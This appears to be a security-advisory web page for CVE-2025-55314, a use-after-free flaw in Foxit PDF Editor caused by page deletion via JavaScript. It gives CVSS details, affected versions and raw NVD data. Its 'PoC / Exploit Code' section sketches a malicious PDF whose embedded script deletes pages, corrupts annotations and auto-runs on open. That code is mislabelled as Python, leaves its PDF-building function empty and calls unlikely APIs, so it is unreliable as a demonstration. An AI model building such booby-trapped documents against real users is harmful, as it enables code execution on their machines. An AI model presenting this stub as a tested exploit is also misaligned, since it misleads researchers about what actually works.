Security Vulnerability Report
中文
CVE-2025-55314 CVSS 7.8 HIGH

CVE-2025-55314

Published: 2025-12-11 16:16:26
Last Modified: 2025-12-18 21:32:14
Source: [email protected]

Description

An issue was discovered in Foxit PDF and Editor for Windows and macOS before 13.2 and 2025 before 2025.2. When pages in a PDF are deleted via JavaScript, the application may fail to properly update internal states. Subsequent annotation management operations assume these states are valid, causing dereference of invalid or released memory. This can lead to memory corruption, application crashes, and potentially allow an attacker to execute arbitrary code.

CVSS Details

CVSS Score
7.8
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:foxit:pdf_editor:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:foxit:pdf_editor:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:foxit:pdf_editor:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:foxit:pdf_editor:2025.1.0.27937:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:foxit:pdf_reader:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:microsoft:windows:-:*:*:*:*:*:*:* - NOT VULNERABLE
Foxit PDF Editor for Windows < 13.2
Foxit PDF Editor for macOS < 13.2
Foxit PDF Editor 2025 (Windows) < 2025.2
Foxit PDF Editor 2025 (macOS) < 2025.2

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
// CVE-2025-55314 PoC - Foxit PDF Editor Page Deletion Memory Corruption // This PoC demonstrates the vulnerability in Foxit PDF Editor // Target: Foxit PDF Editor < 13.2 or < 2025.2 // Create a malicious PDF with embedded JavaScript var maliciousPDF = { createMaliciousPDF: function() { // Step 1: Create a PDF with annotations var pdf = this.createPDFWithAnnotations(); // Step 2: Insert malicious JavaScript var js = ""; js += "// CVE-2025-55314 Exploitation Trigger\n"; js += "function triggerVulnerability() {\n"; js += " // Delete pages via JavaScript - triggers improper state update\n"; js += " for (var i = 0; i < 3; i++) {\n"; js += " this.deletePages(1); // Delete page 1 repeatedly\n"; js += " }\n"; js += " \n"; js += " // After page deletion, annotation operations assume invalid states\n"; js += " // This causes use-after-free when accessing released memory\n"; js += " try {\n"; js += " var annots = this.getAnnots();\n"; js += " for (var j = 0; j < annots.length; j++) {\n"; js += " annots[j].setProperty('contents', 'malicious');\n"; js += " }\n"; js += " } catch(e) {\n"; js += " // Memory corruption may occur silently\n"; js += " }\n"; js += "}\n"; js += "\n"; js += "// Auto-trigger on document open\n"; js += "app.setTimeOut('triggerVulnerability()', 1000);"; pdf.addJavaScript(js); return pdf; }, createPDFWithAnnotations: function() { // Create PDF with multiple pages and annotations // Annotations will be in inconsistent state after page deletion } }; // Usage: // 1. Generate the malicious PDF using this script // 2. Open with vulnerable Foxit PDF Editor version // 3. JavaScript executes automatically, triggering memory corruption // 4. Can lead to arbitrary code execution or application crash

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-55314", "sourceIdentifier": "[email protected]", "published": "2025-12-11T16:16:25.953", "lastModified": "2025-12-18T21:32:14.230", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "An issue was discovered in Foxit PDF and Editor for Windows and macOS before 13.2 and 2025 before 2025.2. When pages in a PDF are deleted via JavaScript, the application may fail to properly update internal states. Subsequent annotation management operations assume these states are valid, causing dereference of invalid or released memory. This can lead to memory corruption, application crashes, and potentially allow an attacker to execute arbitrary code."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "baseScore": 7.8, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-476"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:foxit:pdf_editor:*:*:*:*:*:*:*:*", "versionEndIncluding": "13.1.7.23637", "matchCriteriaId": "F900FF8A-7BFA-442E-BC8C-5A3717961DD5"}, {"vulnerable": true, "criteria": "cpe:2.3:a:foxit:pdf_editor:*:*:*:*:*:*:*:*", "versionStartIncluding": "2023.1.0.15510", "versionEndIncluding": "2023.3.0.23028", "matchCriteriaId": "0C75FEE6-54F3-49C6-BAEA-A09D23BE5D64"}, {"vulnerable": true, "criteria": "cpe:2.3:a:foxit:pdf_editor:*:*:*:*:*:*:*:*", "versionStartIncluding": "2024.1.0.23997", "versionEndIncluding": "2024.4.1.27687", "matchCriteriaId": "2C06BC41-9831-4AE3-B10B-3FC313D01580"}, {"vulnerable": true, "criteria": "cpe:2.3:a:foxit:pdf_editor:2025.1.0.27937:*:*:*:*:*:*:*", "matchCriteriaId": "9FDC914F-B999-4233-8BEA-CA20B1F0D9D3"}, {"vulnerable": true, "criteria": "cpe:2.3:a:foxit:pdf_reader:*:*:*:*:*:*:*:*", "versionEndIncluding": "2025.1.0.27937", "matchCriteriaId": "DB827B5A-9957-43B2-A633-EF5442A2EF35"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:o:microsoft:windows:-:*:*:*:*:*:*:*", "matchCriteriaId": "A2572D17-1DE6-457B-99CC-64AFD54487EA"}]}]}], "references": [{"url": "https://www.foxit.com/support/security-bulletins.html", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.